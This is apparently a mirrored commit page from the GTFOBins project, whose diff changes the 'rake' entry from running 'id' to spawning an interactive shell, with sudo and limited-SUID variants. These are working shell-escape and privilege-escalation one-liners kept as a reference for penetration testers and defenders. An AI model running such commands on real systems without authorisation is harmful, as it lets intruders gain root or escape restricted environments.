mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Upgrade rake to proper interactive shell
This commit is contained in:
parent
9956127653
commit
5decf3493a
@ -1,7 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
command:
|
shell:
|
||||||
- code: rake -p '`/usr/bin/id`'
|
- code: rake -p '`/bin/sh 1>&0`'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo rake -p '`/usr/bin/id`'
|
- code: sudo rake -p '`/bin/sh 1>&0`'
|
||||||
|
limited-suid:
|
||||||
|
- code: ./rake -p '`/bin/sh 1>&0`'
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user